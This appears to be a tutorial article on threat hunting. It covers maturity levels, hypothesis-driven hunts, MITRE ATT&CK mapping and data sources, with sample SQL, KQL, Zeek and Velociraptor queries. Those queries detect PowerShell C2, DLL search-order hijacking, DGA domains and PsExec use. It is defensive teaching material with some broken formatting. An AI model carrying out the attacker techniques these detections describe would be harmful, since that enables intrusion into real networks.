Threat Hunting


Introduction

Threat hunting is the proactive search for malicious activity that evades existing security controls. Unlike automated detection, hunting is hypothesis-driven and iterative. It assumes that adversaries are already inside the network and seeks to find them before they achieve their objectives.

The Hunting Maturity Model

The Hunting Maturity Model (HMM) describes an organization's hunting capability across five levels:


* **HMM0 — Initial**: Relies on automated alerts only; no proactive hunting

* **HMM1 — Minimal**: IOC-based hunting using threat intelligence feeds

* **HMM2 — Procedural**: Hunting follows documented procedures

* **HMM3 — Innovative**: Creates novel data analysis techniques

* **HMM4 — Leading**: Automates hunting at scale


Hypothesis-Driven Hunting

The hypothesis is the foundation of every hunt. It should be testable, specific, and grounded in threat intelligence or risk assessment.




# Hypothesis: An adversary is using PowerShell for C2 communication


# Test: Find PowerShell processes making outbound connections




def hunt_powershell_c2(time_window_hours=72):


query = f"""


SELECT p.pid, p.command_line, p.start_time,


u.username, h.dest_ip, h.dest_port


FROM processes p


JOIN users u ON p.user_id = u.id


JOIN network_connections h ON p.pid = h.pid


WHERE p.name = 'powershell.exe'


AND h.remote_port IN (80, 443, 8080)


AND p.start_time > NOW() - INTERVAL '{time_window_hours} hours'


AND p.command_line NOT LIKE '%WindowsPowerShell%'


"""


results = execute_hunt(query)




for row in results:


if suspicious_patterns.match(row.command_line):


yield HuntingFinding(


hypothesis="PowerShell C2",


evidence=row,


severity="high"


)





MITRE ATT&CK; Mapping

The MITRE ATT&CK; framework provides a common taxonomy for adversary behavior. Mapping hunts to ATT&CK; techniques ensures comprehensive coverage.




hunt:


name: "DLL Search Order Hijacking"


technique_id: T1574.001


tactic: Persistence, Privilege Escalation




data_sources:


- Windows Event ID 4688 (Process Creation)


- Sysmon Event ID 7 (Image Loaded)


- File creation events in system directories




hypothesis: "Adversary places malicious DLL in search path before legitimate application loads"




query:


platform: kql


text: >


Sysmon


| where EventID == 7


| where ImageLoaded contains "\\Temp\\"


or ImageLoaded contains "\\Users\\"


| where ImageLoaded endswith ".dll"


| join kind=inner (


Sysmon | where EventID == 1


) on ProcessGuid





Data Sources for Hunting

Effective hunting requires rich telemetry. The best sources include:


* **Process creation logs** (Event ID 4688 / Sysmon Event ID 1)

2\. **Network connections** (Sysmon Event ID 3, NetFlow, Zeek logs) 3\. **DNS queries** (Zeek DNS, Windows DNS client logs) 4\. **File system changes** (Sysmon Event ID 11) 5\. **Registry modifications** (Sysmon Event ID 12-14) 6\. **PowerShell operational logs** (Event ID 4103, 4104)














C:\Windows\*\*











Hunting Tools




# Velociraptor: collect process listing across fleet


velociraptor --config client.config.yaml


--artifacts Windows.System.TaskScheduler


--format json > scheduled_tasks.json




# Zeek: analyze DNS logs for DGA patterns


zeek-cut dns.query < dns.log | \


grep -v '\.$' | \


awk '{len=length($1)} len>20 {print $1, len}' | \


sort | uniq -c | sort -rn | head -20




# KQL: hunting in Microsoft 365 Defender


DeviceProcessEvents


| where Timestamp > ago(7d)


| where ProcessVersionInfoProductName == "PsExec"


| where ProcessCommandLine contains "-s"


| summarize LatestProcess=arg_max(Timestamp, *) by DeviceName


| project DeviceName, AccountName, ProcessCommandLine, Timestamp





Data Analysis Techniques




# Stack counting for anomaly detection


def stack_count(events, field, top_n=10):


"""Identify unusually frequent values."""


counts = Counter(getattr(e, field) for e in events)


total = sum(counts.values())


for value, count in counts.most_common(top_n):


ratio = count / total


baseline = expected_ratio.get(field, value, 0.01)


if ratio > baseline * 3: # 3x expected baseline


yield Anomaly(field, value, ratio, baseline)





Conclusion

Threat hunting transforms security operations from reactive to proactive. Start with structured hypotheses based on threat intelligence, map hunts to MITRE ATT&CK; techniques, ensure comprehensive data collection, and iterate based on findings. Mature hunting programs progressively automate successful hunt patterns into detection rules.